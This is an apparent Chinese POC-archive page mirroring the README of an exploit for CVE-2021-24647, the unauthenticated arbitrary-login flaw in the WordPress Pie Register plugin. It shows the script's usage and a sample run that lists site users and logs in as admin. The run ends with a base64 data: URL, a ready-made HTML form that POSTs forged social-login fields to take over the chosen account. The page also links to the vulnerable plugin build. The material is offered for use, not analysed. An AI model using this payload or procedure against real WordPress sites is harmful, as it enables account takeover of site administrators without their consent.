支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: f078a8bb10f46fff2c7915efd4cd182858326f75

来源
https://github.com/RandomRobbieBF/CVE-2021-24647
关联漏洞
标题:WordPress 插件授权问题漏洞 (CVE-2021-24647)
Description:WordPress是Wordpress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress 插件是WordPress开源的一个应用插件。 WordPress plugin 存在授权问题漏洞,该漏洞源于 Pie Register 插件在社交登录实现中存在缺陷,允许未经身份验证的攻击者仅通过知道其用户 ID 或用户名就可以作为站点上的任何用户登录。
Description
CVE-2021-24647 Pie Register < 3.7.1.6 - Unauthenticated Arbitrary Login
介绍
# CVE-2021-24647
CVE-2021-24647 Pie Register &lt; 3.7.1.6 - Unauthenticated Arbitrary Login

Info
---

```
usage: exploit.py [-h] -w URL [-p PATH]

options:
  -h, --help            show this help message and exit
  -w URL, --url URL     URL of the WordPress site
  -p PATH, --path PATH  Path of the Login Page /login/ or /pie-registration/
```

How to use
---


```
$ python3 exploit.py -w http://wordpress.lan
The plugin version is below 3.7.1.6.
The plugin version is 3.7.1.4
Select a user:
1. admin
Enter the user ID: 1

Boom we were able to login as admin copy and paste the following in to your browser and refresh and you will be logged in.

data:text/html;base64,PGh0bWw+PGJvZHk+CiAgICAgICAgICAgICAgICAgICAgIDxzY3JpcHQ+aGlzdG9yeS5wdXNoU3RhdGUoJycsICcnLCAnLycpOzwvc2NyaXB0PgogICAgICAgICAgICAgICAgICAgICA8Zm9ybSBhY3Rpb249Imh0dHA6Ly93b3JkcHJlc3MubGFuL2xvZ2luLyIgbWV0aG9kPSJQT1NUIj4KICAgICAgICAgICAgICAgICAgICAgPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0ibG9nIiB2YWx1ZT0iYSIgLz4KICAgICAgICAgICAgICAgICAgICAgPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0icHdkIiB2YWx1ZT0iYSIgLz4KICAgICAgICAgICAgICAgICAgICAgPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0ic29jaWFsJiM5NTtzaXRlIiB2YWx1ZT0idHJ1ZSIgLz4KICAgICAgICAgICAgICAgICAgICAgPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0idXNlciYjOTU7aWQmIzk1O3NvY2lhbCYjOTU7c2l0ZSIgdmFsdWU9IjEiIC8+CiAgICAgICAgICAgICAgICAgICAgIDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9IndwJiM0NTtzdWJtaXQiIHZhbHVlPSJMb2cmIzMyO0luIiAvPgogICAgICAgICAgICAgICAgICAgICA8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJ0ZXN0Y29va2llIiB2YWx1ZT0iMSIgLz48aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iU3VibWl0IHJlcXVlc3QiIC8+CiAgICAgICAgICAgICAgICAgICAgIDwvZm9ybT48L2JvZHk+PC9odG1sPg==
```

Vulnerable Plugin Download
[https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip](https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip)
文件快照

 [4.0K]  /data/pocs/f078a8bb10f46fff2c7915efd4cd182858326f75
├── [8.1K]  exploit.py
├── [ 34K]  LICENSE
├── [1.7K]  README.md
└── [   4]  requirements.txt

0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。